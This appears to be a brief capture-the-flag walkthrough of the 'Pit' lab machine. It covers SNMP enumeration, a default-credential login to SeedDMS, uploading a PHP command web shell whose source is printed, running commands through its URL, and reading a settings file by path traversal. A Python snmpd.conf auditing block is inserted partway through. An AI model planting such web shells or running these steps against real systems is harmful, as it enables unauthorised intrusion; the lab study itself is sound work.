Pit
SNMP
PORT STATE SERVICE
161/udp open snmp
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
|_ 5:
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 4ca7e41263c5985e00000000
| snmpEngineBoots: 76
|_ snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_ System uptime: 37.94s (3794 timeticks)
SNMP
snmpwalk -v2c -c public 10.10.10.241 . | tee snmpwalk.out
I did not find seeddms when I tried to find the URL with the IP
http://10.10.10.241/seeddms51x/seeddms
Added it to /etc/hosts
In the SNMP output I also found a username, michelle.
michelle:michelle worked.
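The walk above returned the whole tree because the agent answered the default `public` community. As an added example (not part of the original write-up), here is a defender-side audit of a net-snmp `snmpd.conf` for that weakness; the function name and the sample config are constructed for illustration, and the directives checked are net-snmp's `rocommunity`/`rwcommunity`, `com2sec` and `view`.

```python
import shlex

DEFAULT_COMMUNITIES = {"public", "private"}
OPEN_SOURCES = {"default", "0.0.0.0/0", "::/0"}
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}

# Constructed sample config, not taken from the host in the write-up.
SAMPLE_CONF = """\
# constructed example
com2sec notConfigUser default public
rocommunity monitor-7f3a 10.0.5.0/24 -V sysonly
rwcommunity private
view allview included .1
view sysonly included .1.3.6.1.2.1.1
"""

def audit_snmpd_conf(text):
    """Return (line_no, finding) pairs for risky snmpd.conf directives."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        tok = shlex.split(raw, comments=True)  # drops '#' comments
        if not tok:
            continue
        directive, args = tok[0].lower(), tok[1:]
        if directive in COMMUNITY_DIRECTIVES and args:
            # rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
            community = args[0]
            source = args[1] if len(args) > 1 else "default"
            restricted = len(args) > 2
        elif directive == "com2sec" and len(args) >= 3:
            # com2sec [-Cn CONTEXT] SECNAME SOURCE COMMUNITY
            source, community = args[-2], args[-1]
            restricted = True  # scope comes from separate group/access lines
        elif directive == "view" and len(args) >= 3:
            # view NAME included|excluded OID [MASK]
            if args[1] == "included" and args[2].strip(".") in ("1", "iso"):
                findings.append((no, "view includes the whole OID tree"))
            continue
        else:
            continue
        if community in DEFAULT_COMMUNITIES:
            findings.append((no, f"default community string '{community}'"))
        if source in OPEN_SOURCES:
            findings.append((no, "community accepted from any source address"))
        if not restricted:
            findings.append((no, "no OID or view restriction"))
        if directive.startswith("rw"):
            findings.append((no, "write access granted"))
    return findings
```
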
Did a searchsploit against seeddms
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Add document.
The backdoor can be located but first we need to know the document
id ->
When hovering your mouse over the file name we can see the
document id. Mine is 29.
Change your document id in the below url.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id
I tried to get a reverse shell but I was not able to (some kind of
firewall, maybe), so I used what I had to get some credentials.
Enumerating more, there was another conf directory in one more ../
../../../conf/settings.xml
PORT 9090
I have a web terminal
michael can write and execute, but can't read, that is why when I tried
to read anything I got an error.
Root